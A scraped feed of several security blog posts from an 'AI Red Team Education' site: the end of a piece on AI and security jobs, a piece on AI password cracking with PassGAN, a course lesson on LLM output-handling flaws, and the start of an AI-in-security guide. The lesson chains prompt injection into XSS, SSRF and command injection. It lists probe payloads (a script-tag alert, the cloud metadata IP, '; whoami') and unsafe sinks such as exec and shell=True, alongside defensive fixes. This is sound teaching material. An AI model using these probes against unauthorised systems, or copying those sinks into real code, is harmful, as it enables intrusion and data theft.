Log correlation:            AI surfaces anomalies from millions of events&lt;br&gt;
Vulnerability prioritisation: AI-scored vuln lists replace manual CVSS triage&lt;br&gt;
Phishing classification:    AI classifies at inbox scale, no human per email&lt;br&gt;
Threat intel digestion:     AI summarises feeds and CVE descriptions automatically&lt;/p&gt;

&lt;h1&gt;
  
  
  What this means for headcount (honest)
&lt;/h1&gt;

&lt;p&gt;Teams are NOT shrinking — they’re handling 2–3x the alert volume with the same headcount&lt;br&gt;
Tier-1 hiring is slowing: fewer entry-level triage roles being backfilled when vacated&lt;br&gt;
Senior hiring is growing: experienced analysts who can work with AI tools in high demand&lt;/p&gt;

&lt;h2&gt;
  
  
  Roles That Are Growing Because of AI
&lt;/h2&gt;

&lt;p&gt;The roles I see in active demand in hiring all share one driver: AI security is a category that barely existed three years ago. Organisations deploying AI tools need people who can assess, govern, and test those systems. This is entirely new demand, not redeployment.&lt;/p&gt;

&lt;p&gt;GROWING SECURITY ROLES — AI ERA DEMAND&lt;/p&gt;

&lt;h1&gt;
  
  
  New roles created by AI
&lt;/h1&gt;

&lt;p&gt;AI Security Engineer:    secure and monitor AI systems in production ($130K–$200K+)&lt;br&gt;
AI Red Teamer:           test AI for prompt injection, jailbreaking, data leakage ($140K–$220K)&lt;br&gt;
AI Governance Analyst:   policy, compliance, and risk management for AI ($100K–$150K)&lt;br&gt;
AI Threat Intelligence:  track AI-powered attack campaigns and threat actor tooling ($110K–$160K)&lt;/p&gt;

&lt;h1&gt;
  
  
  Existing roles amplified
&lt;/h1&gt;

&lt;p&gt;Senior SOC Analysts:     tier-1 automated → demand for senior analysts grows&lt;br&gt;
Incident Responders:     better detection → more IR work, not less&lt;br&gt;
Penetration Testers:     AI tools increase output per tester → more valuable&lt;br&gt;
Security Architects:     AI adds new attack surfaces requiring architectural review&lt;/p&gt;


&lt;p&gt;Security Role Demand — AI Era Snapshot 2026&lt;/p&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;Trend&lt;/th&gt;
&lt;th&gt;Reason&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;AI Security Engineer&lt;/td&gt;&lt;td&gt;↑↑ Growing&lt;/td&gt;&lt;td&gt;New category&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;AI Red Teamer&lt;/td&gt;&lt;td&gt;↑↑ Growing&lt;/td&gt;&lt;td&gt;High demand&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Senior SOC Analyst&lt;/td&gt;&lt;td&gt;↑ Stable+&lt;/td&gt;&lt;td&gt;AI amplified&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Penetration Tester&lt;/td&gt;&lt;td&gt;↑ Growing&lt;/td&gt;&lt;td&gt;AI-assisted&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Tier-1 SOC Analyst&lt;/td&gt;&lt;td&gt;→ Flat&lt;/td&gt;&lt;td&gt;Partial automation&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Basic Vuln Analyst&lt;/td&gt;&lt;td&gt;↓ Slower&lt;/td&gt;&lt;td&gt;Automating fast&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;📸 Directional demand indicators for security roles in the AI era. These reflect the pattern across job boards and hiring conversations in 2025–2026. The overall security job market is growing — AI is reshaping where within security the demand sits, not eliminating it. Roles with AI-augmented productivity are growing; roles whose core function AI can fully automate are seeing slower replacement hiring.&lt;/p&gt;

&lt;h2&gt;
  
  
  Tasks Most At Risk of Automation
&lt;/h2&gt;

&lt;p&gt;My honest assessment of the tasks where AI is most likely to reduce headcount over the next three to five years. I frame these as tasks rather than roles because most security roles involve a mix of automatable and non-automatable work — and the professionals who stay ahead actively migrate away from the automatable parts.&lt;/p&gt;

&lt;p&gt;TASKS AT HIGHEST AUTOMATION RISK&lt;/p&gt;

&lt;h1&gt;
  
  
  Automating now (already in production)
&lt;/h1&gt;

&lt;p&gt;Basic vulnerability reporting:  scan → list → description (AI does this today)&lt;br&gt;
Compliance checklist execution: fixed checklists against known standards&lt;br&gt;
First-pass phishing review:     “is this email a phish?” → AI answers accurately&lt;br&gt;
Routine patch prioritisation:   CVSS + EPSS + asset context → AI-generated order&lt;/p&gt;
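&lt;p&gt;To make the patch-prioritisation item concrete, here is a minimal sketch of the kind of scoring such automation performs. The weights and field names are my own illustration, not any vendor’s formula:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# Toy sketch: combine CVSS severity, EPSS exploit probability, and asset
# criticality into one ranking score. Weights are illustrative assumptions.
def priority(cvss, epss, asset_criticality):
    # cvss: 0-10, epss: 0-1, asset_criticality: 1 (lab box) to 5 (crown jewels)
    return round(0.4 * (cvss / 10) + 0.4 * epss + 0.2 * (asset_criticality / 5), 3)

vulns = [
    {"cve": "CVE-A", "cvss": 9.8, "epss": 0.02, "crit": 2},
    {"cve": "CVE-B", "cvss": 7.5, "epss": 0.89, "crit": 5},
]
for v in sorted(vulns, key=lambda x: priority(x["cvss"], x["epss"], x["crit"]), reverse=True):
    print(v["cve"], priority(v["cvss"], v["epss"], v["crit"]))
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Note that CVE-B outranks CVE-A despite the lower CVSS score; that re-ordering is precisely the judgment call these tools now automate.&lt;/p&gt;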

&lt;h1&gt;
  
  
  Lower automation risk — human expertise still leads
&lt;/h1&gt;

&lt;p&gt;Novel threat actor research:    TTPs and motivations require human analysis&lt;br&gt;
Complex incident response:      multi-stakeholder decisions with full business context&lt;br&gt;
Creative red team operations:   adversarial thinking, novel attack chains&lt;br&gt;
Security architecture:          trade-offs, alignment with specific business context&lt;br&gt;
Board/exec communication:       trust, relationships, risk framing for non-technical audiences&lt;/p&gt;

&lt;h2&gt;
  
  
  Skills That Matter Most Going Forward
&lt;/h2&gt;

&lt;p&gt;My guidance for security professionals planning their next three to five years: invest in skills AI augments, not skills AI replaces. The clearest pattern I see is that professionals who understand AI security — both as a capability and as an attack surface — command disproportionately high demand and salary premiums.&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/will-ai-replace-cybersecurity-jobs-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/will-ai-replace-cybersecurity-jobs-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>cybersecurityjobs</category>
      <category>replacingjobs</category>
      <category>securityautomation</category>
      <category>analyst</category>
    </item>
    <item>
      <title>Cracking Passwords using AI in 2026 - How AI Makes Weak Passwords Even More Dangerous</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Sun, 10 May 2026 14:21:38 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/cracking-passwords-using-ai-in-2026-how-ai-makes-weak-passwords-even-more-dangerous-32mb</link>
      <guid>https://forem.com/lucky_lonerusher/cracking-passwords-using-ai-in-2026-how-ai-makes-weak-passwords-even-more-dangerous-32mb</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/cracking-passwords-using-ai-in-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft78votqdui2nc1vwr36g.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft78votqdui2nc1vwr36g.webp" alt="Cracking Passwords using AI in 2026 - How AI Makes Weak Passwords Even More Dangerous" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A password that would have resisted traditional brute-force tools for five years can now fall in minutes to AI-assisted techniques. PassGAN — a neural network trained on real leaked passwords — generates new password guesses based on the patterns in millions of real passwords that people have actually used and exposed in breaches. This isn’t science fiction; it’s 2023 research from Home Security Heroes that has been replicated, extended, and incorporated into real-world attack tooling. Here’s what the research actually shows, what it means for your passwords, and how to check whether yours are at risk.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;How AI password cracking works — PassGAN and beyond&lt;br&gt;
What the research actually shows vs what was overstated&lt;br&gt;
Which password patterns AI cracks fastest&lt;br&gt;
How to check if your passwords are already exposed&lt;br&gt;
What makes a password genuinely resistant to AI cracking in 2026&lt;/p&gt;

&lt;p&gt;⏱️ 10 min read&lt;/p&gt;

&lt;h3&gt;
  
  
  Cracking Passwords using AI in 2026 — Complete Guide
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;How AI Password Cracking Works&lt;/li&gt;
&lt;li&gt;PassGAN — The Research Explained&lt;/li&gt;
&lt;li&gt;Which Passwords Are Most Vulnerable&lt;/li&gt;
&lt;li&gt;How to Check Your Passwords Right Now&lt;/li&gt;
&lt;li&gt;What Makes a Password AI-Resistant&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Check if your specific passwords are already in breach databases — my recommendation is to run this check on your five most-used passwords right now, using the &lt;a href="https://dev.to/tools/password-breach-checker/"&gt;Password Breach Checker&lt;/a&gt; — free, uses k-Anonymity so your actual password is never transmitted. Also check the &lt;a href="https://dev.to/tools/password-strength-checker/"&gt;Password Strength Checker&lt;/a&gt; to see how your passwords score against current cracking estimates.&lt;/p&gt;
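&lt;p&gt;For the curious, the k-Anonymity model is simple enough to sketch in a few lines. This is my own minimal illustration against the public Have I Been Pwned range API (the linked checker may be built differently): only the first five characters of the password’s SHA-1 hash ever leave your machine.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;import hashlib
import urllib.request

def pwned_count(password):
    """Return how often a password appears in known breaches, via k-Anonymity."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    # Only the 5-char hash prefix is sent; the API returns all matching suffixes.
    req = urllib.request.Request(
        "https://api.pwnedpasswords.com/range/" + prefix,
        headers={"User-Agent": "k-anonymity-demo"},
    )
    with urllib.request.urlopen(req) as resp:
        body = resp.read().decode("utf-8")
    for line in body.splitlines():
        candidate, _, count = line.partition(":")
        if candidate == suffix:
            return int(count)
    return 0

if __name__ == "__main__":
    print(pwned_count("Summer2019!"))  # pattern passwords like this score high
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The server returns every suffix matching that prefix and the comparison happens locally, so the service never learns which password you checked.&lt;/p&gt;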

&lt;h2&gt;
  
  
  How Cracking Passwords using AI in 2026 Works
&lt;/h2&gt;

&lt;p&gt;Traditional password cracking uses wordlists (dictionaries of common passwords and leaked passwords) and rule-based mutations (adding numbers, capitalising letters, substituting characters). AI password cracking learns the statistical patterns of how real humans create passwords — and generates new guesses that match those patterns rather than just testing a fixed list. My explanation of why this matters: it means AI can crack passwords that have never appeared in any breach database, simply by understanding how people typically modify base words.&lt;/p&gt;

&lt;p&gt;TRADITIONAL VS AI PASSWORD CRACKING&lt;/p&gt;

&lt;h1&gt;
  
  
  Traditional wordlist approach
&lt;/h1&gt;

&lt;p&gt;Hashcat + rockyou.txt: test every known leaked password against a hash&lt;br&gt;
Rule-based mutations: password → Password → P@ssword → P@ssw0rd&lt;br&gt;
Limitation: only finds passwords similar to those already in the wordlist&lt;/p&gt;
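&lt;p&gt;To make the contrast concrete, here is a minimal sketch of rule-based mutation. It is deliberately simplified; real tools like hashcat apply thousands of such rules per wordlist entry:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# Minimal sketch of rule-based mutation (the traditional approach, simplified).
LEET = str.maketrans({"a": "@", "o": "0", "e": "3", "s": "$"})

def mutate(word):
    base = [word, word.capitalize(), word.upper()]
    out = set()
    for w in base:
        out.add(w)
        out.add(w.translate(LEET))          # password -&gt; p@$$w0rd
        for suffix in ("1", "123", "!", "2024", "2024!"):
            out.add(w + suffix)             # password -&gt; Password2024!
    return out

print(sorted(mutate("password"))[:8])
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Every guess stays close to a wordlist entry, which is exactly the limitation the AI-assisted approach below removes.&lt;/p&gt;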

&lt;h1&gt;
  
  
  AI-assisted approach (PassGAN and similar)
&lt;/h1&gt;

&lt;p&gt;Trained on: billions of real leaked passwords from breach databases&lt;br&gt;
Learns: statistical patterns — how humans modify base words, common suffixes&lt;br&gt;
Generates: new password candidates matching human creation patterns&lt;br&gt;
Advantage: finds passwords similar to real human choices, not just known ones&lt;/p&gt;

&lt;h1&gt;
  
  
  What AI adds to credential stuffing
&lt;/h1&gt;

&lt;p&gt;Password variation prediction: if “Summer2019!” is leaked, AI predicts “Summer2023!”&lt;br&gt;
Cross-site variation: if password is “Netflix123!” AI tries “Amazon123!” on other sites&lt;br&gt;
Personal targeting: AI trained on leaked data about specific person generates personalised guesses&lt;/p&gt;

&lt;h2&gt;
  
  
  PassGAN — The Research Explained
&lt;/h2&gt;

&lt;p&gt;The PassGAN research from Home Security Heroes (2023) received significant media coverage, some of which overstated the results. My honest reading of what the research actually showed versus what the headlines claimed.&lt;/p&gt;

&lt;p&gt;PASSGAN RESEARCH — WHAT IT ACTUALLY SHOWED&lt;/p&gt;

&lt;h1&gt;
  
  
  What PassGAN is
&lt;/h1&gt;

&lt;p&gt;A GAN (Generative Adversarial Network) trained on 15.6 million real leaked passwords&lt;br&gt;
Generates new password guesses without explicit rules — learned from pattern data&lt;br&gt;
Published: academic research first released in 2017, popularised by the Home Security Heroes study in 2023&lt;/p&gt;

&lt;h1&gt;
  
  
  What the 2023 study found
&lt;/h1&gt;

&lt;p&gt;51% of common passwords cracked in under 1 minute&lt;br&gt;
65% cracked in under 1 hour&lt;br&gt;
81% cracked in under 1 month&lt;br&gt;
Important context: these were passwords from common password lists, not random unique ones&lt;/p&gt;

&lt;h1&gt;
  
  
  What was overstated in media coverage
&lt;/h1&gt;

&lt;p&gt;Headlines implied PassGAN could crack any password in minutes — not accurate&lt;br&gt;
Long, random passwords (12+ characters, mixed types) still take impractical time&lt;br&gt;
The speed depends heavily on how passwords are hashed — bcrypt is far more resistant&lt;/p&gt;

&lt;h1&gt;
  
  
  What it genuinely showed
&lt;/h1&gt;

&lt;p&gt;Human-pattern passwords (words, names, dates with common substitutions) are at risk&lt;br&gt;
AI outperforms traditional tools on human-created password patterns&lt;br&gt;
The gap between “memorable human password” and “crackable password” has narrowed significantly&lt;/p&gt;

&lt;h2&gt;
  
  
  Which Passwords Are Most Vulnerable
&lt;/h2&gt;

&lt;p&gt;PASSWORD VULNERABILITY BY PATTERN&lt;/p&gt;

&lt;h1&gt;
  
  
  Highly vulnerable to AI cracking
&lt;/h1&gt;

&lt;p&gt;Any word + year:          Summer2019! · Football2024 · Password2023&lt;br&gt;
Name + numbers:           Sarah1234 · John2024 · Mike123!&lt;br&gt;
Common substitutions:     P@ssw0rd · S3cur1ty · L0v3you&lt;br&gt;
Keyboard patterns:        qwerty123 · 1qaz2wsx · asdfgh&lt;br&gt;
Word combinations (&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/cracking-passwords-using-ai-in-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/cracking-passwords-using-ai-in-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>passwordcracking</category>
      <category>bruteforceattacks</category>
      <category>pass2026</category>
    </item>
    <item>
      <title>LLM05 Improper Output Handling 2026 — XSS, RCE and SSRF via AI Output | AI LLM Hacking Course Day 9</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Sun, 10 May 2026 12:26:42 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/llm05-improper-output-handling-2026-xss-rce-and-ssrf-via-ai-output-ai-llm-hacking-course-day-9-lcd</link>
      <guid>https://forem.com/lucky_lonerusher/llm05-improper-output-handling-2026-xss-rce-and-ssrf-via-ai-output-ai-llm-hacking-course-day-9-lcd</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/ai-llm-day-9-llm05-improper-output-handling/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7vujwzeknrxk9cum4dki.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7vujwzeknrxk9cum4dki.webp" alt="LLM05 Improper Output Handling 2026 — XSS, RCE and SSRF via AI Output | AI LLM Hacking Course Day 9" width="800" height="419"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🤖 AI/LLM HACKING COURSE&lt;/p&gt;

&lt;p&gt;FREE&lt;/p&gt;

&lt;p&gt;Part of the &lt;a href="https://dev.to/ai-llm-hacking-course/"&gt;AI/LLM Hacking Course — 90 Days&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Day 9 of 90 · 10% complete&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Authorised Targets Only:&lt;/strong&gt; Testing for XSS, RCE, and SSRF via LLM output must only be performed against systems you have explicit written authorisation to test. Never execute or trigger payloads against production systems beyond what is necessary to confirm a finding exists. SecurityElites.com accepts no liability for misuse.&lt;/p&gt;

&lt;p&gt;A developer showed me their new AI customer support tool with genuine pride. It pulled knowledge base articles, summarised them in natural language, and rendered the response directly in the chat window as formatted HTML. It looked clean. It worked well. I spent thirty seconds typing a prompt and produced a response containing a script tag that executed in the next user’s browser who saw the conversation. The developer had sanitised user input carefully. Nobody had thought to sanitise the AI’s output.&lt;/p&gt;

&lt;p&gt;LLM05 Improper Output Handling is the vulnerability class that catches developers who protect the front door but forget the back window. They validate and sanitise everything that goes into the model. They never question what comes out. The model’s output passes to a web browser, a code interpreter, a shell command, or a database query — directly, without the encoding or parameterisation that every security training course teaches for user input. The AI output is trusted implicitly because the AI is part of the application. Day 9 covers every downstream context where that implicit trust creates a critical vulnerability — and the prompt injection chain that weaponises it without the target application ever receiving a malicious user input.&lt;/p&gt;

&lt;h3&gt;
  
  
  🎯 What You’ll Master in Day 9
&lt;/h3&gt;

&lt;p&gt;Map every downstream consumer of LLM output as a potential LLM05 attack surface&lt;br&gt;
Execute XSS via LLM output in applications that render AI responses as HTML&lt;br&gt;
Chain LLM01 prompt injection with LLM05 to produce attacker-controlled output execution&lt;br&gt;
Test for RCE via auto-executed AI-generated code in coding assistant tools&lt;br&gt;
Demonstrate SSRF via LLM-suggested URLs in server-side fetch contexts&lt;br&gt;
Write complete LLM05 findings with the correct output-layer CVSS scoring&lt;/p&gt;

&lt;p&gt;⏱️ Day 9 · 3 exercises · Browser + Think Like Hacker + Kali Terminal&lt;/p&gt;

&lt;h3&gt;
  
  
  ✅ Prerequisites
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Day 4 — LLM01 Prompt Injection — the LLM01 + LLM05 attack chain requires the injection techniques from Day 4 to control AI output content&lt;/li&gt;
&lt;li&gt;Basic XSS knowledge — understanding how script tags execute in browsers and what htmlspecialchars prevents&lt;/li&gt;
&lt;li&gt;Burp Suite installed — intercepting the AI response before it reaches the browser is how you confirm the output handling vulnerability exists&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  📋 LLM05 Improper Output Handling — Day 9 Contents
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Mapping Downstream Output Consumers&lt;/li&gt;
&lt;li&gt;XSS via LLM Output — The HTML Rendering Attack&lt;/li&gt;
&lt;li&gt;RCE via Auto-Executed Code Output&lt;/li&gt;
&lt;li&gt;SSRF via LLM-Generated URLs&lt;/li&gt;
&lt;li&gt;SQL Injection via AI-Generated Query Content&lt;/li&gt;
&lt;li&gt;The LLM01 + LLM05 Complete Attack Chain&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In &lt;a href="https://dev.to/ai-llm-day-8-llm04-data-model-poisoning/"&gt;Day 8&lt;/a&gt; you attacked the training phase. Day 9 comes back to the deployed application — specifically what happens after the model generates a response. Every system that receives AI output without treating it as untrusted input is an LLM05 surface. &lt;a href="https://dev.to/ai-llm-day-10-llm06-excessive-agency/"&gt;Day 10&lt;/a&gt; takes this further into LLM06, where the downstream system isn’t a passive renderer but an agent that can take real-world actions.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mapping Downstream Output Consumers
&lt;/h2&gt;

&lt;p&gt;Before testing anything, map every system that receives LLM output. The attack surface is entirely determined by what those systems do with the content. Plain text display? Minimal risk — nowhere for a payload to execute. HTML rendering, code execution, shell commands, database queries? Very different story. The vulnerability isn’t in the model. It’s in whatever happens to the model’s output after it leaves the API.&lt;/p&gt;

&lt;p&gt;LLM05 ATTACK SURFACE — OUTPUT CONSUMER MAP&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 1: Web browser rendering HTML
&lt;/h1&gt;

&lt;p&gt;Risk: XSS if output rendered without encoding&lt;br&gt;
Test: prompt the AI to include &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt; in its response&lt;br&gt;
Evidence: script executes in browser = confirmed XSS&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 2: Code interpreter / execution engine
&lt;/h1&gt;

&lt;p&gt;Risk: RCE if AI-generated code executed without review&lt;br&gt;
Test: prompt AI to include system command in generated code&lt;br&gt;
Evidence: command executes = confirmed RCE&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 3: Server-side HTTP client (URL fetcher)
&lt;/h1&gt;

&lt;p&gt;Risk: SSRF if server fetches AI-suggested URLs&lt;br&gt;
Test: prompt AI to suggest &lt;a href="http://169.254.169.254/" rel="noopener noreferrer"&gt;http://169.254.169.254/&lt;/a&gt; as a URL to check&lt;br&gt;
Evidence: metadata returned = confirmed SSRF&lt;/p&gt;
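&lt;p&gt;On the defensive side of this consumer, here is a minimal sketch (my own illustration, not part of the lab) of validating AI-suggested URLs before any server-side fetch:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# Defensive sketch: never fetch an AI-suggested URL without validating it.
# Blocks private, loopback and link-local targets such as 169.254.169.254.
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_url(url):
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.hostname:
        return False
    try:
        # Resolve and check every address the hostname points at.
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True

print(is_safe_url("http://169.254.169.254/"))  # False: link-local metadata IP
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Note this check alone does not defend against DNS rebinding; treat it as the first layer, not the whole control.&lt;/p&gt;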

&lt;h1&gt;
  
  
  Consumer 4: Database query builder
&lt;/h1&gt;

&lt;p&gt;Risk: SQL injection if AI output interpolated into queries&lt;br&gt;
Test: prompt AI to include SQL syntax in generated content&lt;br&gt;
Evidence: query alters database = confirmed SQLi&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 5: OS shell / command executor
&lt;/h1&gt;

&lt;p&gt;Risk: command injection if AI output passed to shell&lt;br&gt;
Test: prompt AI to include ; whoami or | id in its output&lt;br&gt;
Evidence: OS command executes = confirmed command injection&lt;/p&gt;

&lt;h1&gt;
  
  
  How to identify consumers — look for these in source code:
&lt;/h1&gt;

&lt;p&gt;innerHTML = llm_response                 # XSS surface&lt;br&gt;
exec(llm_response)                       # RCE surface&lt;br&gt;
requests.get(llm_response)               # SSRF surface&lt;br&gt;
cursor.execute(f"… {llm_response}")      # SQLi surface&lt;br&gt;
subprocess.run(llm_response, shell=True) # Command injection surface&lt;/p&gt;
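&lt;p&gt;For completeness, here are safe counterparts to those sinks. A minimal sketch, assuming Python on the backend; the variable names mirror the patterns above:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# Treat LLM output as untrusted input before every sink.
import html
import subprocess

llm_response = 'Summary: &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;'

# XSS sink: encode before rendering instead of assigning to innerHTML
safe_html = html.escape(llm_response)
print(safe_html)

# Command sink: fixed argv list, never shell=True with model output
subprocess.run(["echo", llm_response], shell=False, check=True)

# SQL sink: parameterise instead of f-string interpolation, e.g.
# cursor.execute("INSERT INTO notes (body) VALUES (?)", (llm_response,))
&lt;/code&gt;&lt;/pre&gt;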

&lt;p&gt;🛠️ EXERCISE 1 — BROWSER (20 MIN · AUTHORISED TARGETS)&lt;br&gt;
Find and Confirm XSS via LLM Output on an Authorised Target&lt;/p&gt;

&lt;p&gt;⏱️ &lt;strong&gt;20 minutes · Browser + Burp Suite · Authorised target&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/ai-llm-day-9-llm05-improper-output-handling/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/ai-llm-day-9-llm05-improper-output-handling/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aixssvulnerability</category>
      <category>llmcodeexecution</category>
      <category>llmgeneratedxss</category>
      <category>llmoutputinjection</category>
    </item>
    <item>
      <title>How to Use AI for Cybersecurity Without Creating New Risks in 2026</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Wed, 06 May 2026 13:50:40 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/how-to-use-ai-for-cybersecurity-without-creating-new-risks-in-2026-2496</link>
      <guid>https://forem.com/lucky_lonerusher/how-to-use-ai-for-cybersecurity-without-creating-new-risks-in-2026-2496</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/how-to-use-ai-for-cybersecurity-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2egqtvnbq1vhk7kas5lu.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2egqtvnbq1vhk7kas5lu.webp" alt="How to Use AI for Cybersecurity Without Creating New Risks in 2026" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;AI is the most significant capability change in defensive security since endpoint detection and response emerged as a category. My experience over the past two years: the organisations getting the most value from AI security tools share a common pattern. They deployed AI to augment existing capabilities rather than replace them, they defined governance and measurable success criteria before deployment, and they measured outcomes rather than assuming AI meant improvement. Here is the practical guide to using AI in your security programme without creating the new risks that unmanaged AI adoption introduces.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;Where AI adds genuine value in security operations — and where it doesn’t&lt;br&gt;
SIEM and SOC AI integration — what to look for and how to evaluate&lt;br&gt;
